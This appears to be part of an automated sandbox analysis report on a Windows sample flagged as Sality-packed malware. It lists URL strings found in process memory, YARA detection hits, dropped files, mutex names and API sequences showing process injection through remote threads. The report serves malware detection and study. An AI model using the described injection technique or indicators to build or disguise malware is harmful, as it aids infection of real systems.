        Source: SearchApp.exe, 00000013.00000000.2025144010.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fb.me/react-polyfills
        Source: SearchApp.exe, 00000013.00000000.2011488660.0000024B44916000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://fb.me/react-polyfillsThis
        Source: SearchApp.exe, 00000013.00000000.1978747312.0000024B42180000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://gcc.loki.delve.office.com/api
        Source: SearchApp.exe, 00000013.00000000.1978747312.0000024B42180000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://gcchigh.loki.office365.us/api/
        Source: SearchApp.exe, 00000013.00000000.2009862095.0000024B44895000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://gcchigh.loki.office365.us/api/v1/configuration/cortana
        Source: svchost.exe, 00000009.00000000.1856642362.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
        Source: SearchApp.exe, 00000013.00000000.2008268339.0000024B447D3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2039358482.0000024B55252000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://graph.windows.net/
        Source: SearchApp.exe, 00000013.00000000.2039358482.0000024B55252000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://graph.windows.net/parseSharePointUrlResponse
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2062104183.0000024B55CEE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
        Source: svchost.exe, 00000009.00000000.1857045452.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.local
        Source: svchost.exe, 00000009.00000000.1857045452.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.local/
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1983552911.0000024B4248E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.net
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.net/
        Source: SearchApp.exe, 00000013.00000000.1979246867.0000024B4218C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1963261928.0000024341183000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2002312401.0000024B443C2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://loki.delve.office.com/api
        Source: SearchApp.exe, 00000013.00000000.2009862095.0000024B44895000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/cortana
        Source: SearchApp.exe, 00000013.00000000.1979246867.0000024B4218C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://msit.loki.delve.office.com/apiQ
        Source: SearchApp.exe, 00000013.00000000.1981999938.0000024B422C3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1983214754.0000024B42434000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2090383153.0000024B5843A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://mths.be/fromcodepoint
        Source: SearchApp.exe, 00000013.00000000.2154000776.0000024B5BE70000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://ntp.msn.com/web-widget?form=M
        Source: StartMenuExperienceHost.exe, 00000011.00000000.1920598459.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com_
        Source: SearchApp.exe, 00000013.00000000.1977010111.0000024B420F9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.live.com/owa
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://outlook.office.com/
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2008231258.0000024B447CF000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://outlook.office.com/M365.Access
        Source: SearchApp.exe, 00000013.00000000.2120942130.0000024B59FBC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.office.com/M365.AccessZ
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://outlook.office.com/User.ReadWrite
        Source: SearchApp.exe, 00000013.00000000.1968354568.0000024B41B40000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.office.com/User.ReadWriteK
        Source: SearchApp.exe, 00000013.00000000.2145703582.0000024B5AC6C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.office.com/Z
        Source: SearchApp.exe, 00000013.00000000.2007962329.0000024B447AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.office.com/menuItemWithButton
        Source: SearchApp.exe, 00000013.00000000.2047714697.0000024B5549B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.office.com/owa
        Source: SearchApp.exe, 00000013.00000000.2026092369.0000024B54E44000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/
        Source: SearchApp.exe, 00000013.00000000.2081086933.0000024B56C20000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.office365.com/mail/
        Source: SearchApp.exe, 00000013.00000000.2039358482.0000024B55259000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.office365.com/mail/deeplink/attachment/
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
        Source: StartMenuExperienceHost.exe, 00000011.00000000.1920243025.000001B98144E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comxee
        Source: SearchApp.exe, 00000013.00000000.2001152845.0000024B4434A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://rafd.https://r.a
        Source: SearchApp.exe, 00000013.00000000.2001152845.0000024B4434A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://raka.rms_noco-VK
        Source: SearchApp.exe, 00000013.00000000.2025144010.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
        Source: SearchApp.exe, 00000013.00000000.1973204651.0000024B41E30000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://searchapp.bundleassets.example/desktop/2.html
        Source: SearchApp.exe, 00000013.00000000.2163698935.0000024B5C7E8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://searchapp.bundleassets.example/desktop/2.htmlms-appx-web:///Cortana.UI/cache/svlocal/desktop
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
        Source: SearchApp.exe, 00000013.00000000.2150387382.0000024B5B7D0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2135083120.0000024B5A6C5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/
        Source: SearchApp.exe, 00000013.00000000.2007962329.0000024B447AD000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2047873548.0000024B554A2000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2008268339.0000024B447D3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2136586195.0000024B5A784000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2076053917.0000024B56420000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://substrate.office.com
        Source: SearchApp.exe, 00000013.00000000.1968354568.0000024B41B40000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/M365.Access
        Source: SearchApp.exe, 00000013.00000000.2046239293.0000024B55425000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/M365.AccessBUK
        Source: SearchApp.exe, 00000013.00000000.2047088178.0000024B5546F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWrite
        Source: SearchApp.exe, 00000013.00000000.2039358482.0000024B55259000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWriteO
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/api/v2.0/Users(
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/imageB2/v1.0/users/
        Source: SearchApp.exe, 00000013.00000000.2121312411.0000024B59FD3000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/imageB2/v1.0/users/https://substrate.office365.us/imageB2/v1.0/users/u.
        Source: SearchApp.exe, 00000013.00000000.2002312401.0000024B443C2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/search/api
        Source: SearchApp.exe, 00000013.00000000.2039358482.0000024B55259000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/search/api/v1/events?scenario=
        Source: SearchApp.exe, 00000013.00000000.2042423325.0000024B5530E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/search/api/v2/queryetItemChttps://substrate.office365.us/search/api/v2/
        Source: SearchApp.exe, 00000013.00000000.2046239293.0000024B55425000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office365.us
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://substrate.office365.us/api/v2.0/Users(
        Source: SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://substrate.office365.us/imageB2/v1.0/users/
        Source: SearchApp.exe, 00000013.00000000.1955545432.0000024339C00000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.cn/shellRESP
        Source: SearchApp.exe, 00000013.00000000.1955545432.0000024339C00000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com/shell
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C557000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/L
        Source: explorer.exe, 0000000D.00000000.1892524748.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000011.00000000.1920243025.000001B98144E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com
        Source: SearchApp.exe, 00000013.00000000.1983410823.0000024B4247F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
        Source: SearchApp.exe, 00000013.00000000.2155834634.0000024B5BF90000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/de-ch/play/games/4-pics-1-word/cg-9nrv2p37thp1https://www.msn.com/de-ch/play/gam
        Source: SearchApp.exe, 00000013.00000000.2149734955.0000024B5B640000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/de-ch/play/games/basketball-serial-shooter/cg-9nzb8b5rrfdbhttps://www.msn.com/de
        Source: SearchApp.exe, 00000013.00000000.2149680886.0000024B5B620000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/de-ch/play/games/bricks-breaker-deluxe-crusher/cg-9nnjfbfrzq3j
        Source: SearchApp.exe, 00000013.00000000.2155834634.0000024B5BF90000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/de-ch/play/games/fish-merge-frvr/cg-9mxwbd9sw3prhttps://www.msn.com/de-ch/play/g
        Source: SearchApp.exe, 00000013.00000000.2155834634.0000024B5BF90000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/de-ch/play/games/garden-tales-3/cg-9mx8n3gh3k6q
        Source: SearchApp.exe, 00000013.00000000.2149734955.0000024B5B640000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/de-ch/play?ocid=winpsearchboxexpcta2&cgfrom=cg_dsb_seeMorehttps://www.msn.com/de
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
        Source: SearchApp.exe, 00000013.00000000.1991532239.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2039358482.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2098176257.0000024B58760000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
        Source: SearchApp.exe, 00000013.00000000.1991532239.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2098176257.0000024B58760000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
        Source: SearchApp.exe, 00000013.00000000.2039358482.0000024B55240000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbm
        Source: SearchApp.exe, 00000013.00000000.1960756878.0000024340BDE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/spartan/dhp_l
        Source: SearchApp.exe, 00000013.00000000.1960756878.0000024340BDE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/spartan/mmx0
        Source: SearchApp.exe, 00000013.00000000.1960756878.0000024340BDE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/spartan/ntphttps://www.msn.com/spartan/ntpX
        Source: SearchApp.exe, 00000013.00000000.1991532239.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2098176257.0000024B58760000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
        Source: SearchApp.exe, 00000013.00000000.1991532239.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2039358482.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2098176257.0000024B58760000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
        Source: explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1983552911.0000024B4248E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1990860553.0000024B4402B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://xsts.auth.xboxlive.com
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://xsts.auth.xboxlive.com/
        Source: SearchApp.exe, 00000013.00000000.1990860553.0000024B4402B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://xsts.auth.xboxlive.comm

        System Summary

        Source: 0.2.RHxJqGoGFB.exe.8f0cc4.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | Author: ditekSHen
        Source: 0.2.RHxJqGoGFB.exe.8c0d78.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | Author: ditekSHen
        Source: 0.2.RHxJqGoGFB.exe.8d0000.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | Author: ditekSHen
        Source: RHxJqGoGFB.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: odnhm.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: rkuso.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: clmaq.pif.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Process Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File created: C:\Windows\4451fd
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File deleted: C:\Windows\4451fd
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Code function: 0_2_008FE329
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Code function: 0_2_00906CD0
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Code function: 0_2_008FB614
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe | Code function: 35_2_007F0386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe | Code function: 36_2_00C90386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe | Code function: 37_2_01290386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe | Code function: 38_2_00F60386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe | Code function: 39_2_00DA0386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe | Code function: 40_2_007D0386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe | Code function: 41_2_00B90386
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe | Code function: 42_2_00BB0386
        Source: RHxJqGoGFB.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        Source: 0.2.RHxJqGoGFB.exe.8f0cc4.9.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 0.2.RHxJqGoGFB.exe.8c0d78.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 0.2.RHxJqGoGFB.exe.8d0000.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: clmaq.pif.0.drStatic PE information: Section .text
        Source: rkuso.exe.0.drStatic PE information: Section .text
        Source: odnhm.exe.0.drStatic PE information: Section .text
        Source: RHxJqGoGFB.exeStatic PE information: Section: .data ZLIB complexity 0.9951991889312977
        Source: classification engineClassification label: mal100.spre.evad.winEXE@4/7@0/100
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00901EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_00901EF6
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00902514 CreateToolhelp32Snapshot,Process32First,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,CloseHandle,Process32Next,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,CloseHandle,CloseHandle,0_2_00902514
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_5484_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_4812_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4032_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_492_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5480_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_4444_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6768_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\conhost.exeM_7308_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2996_
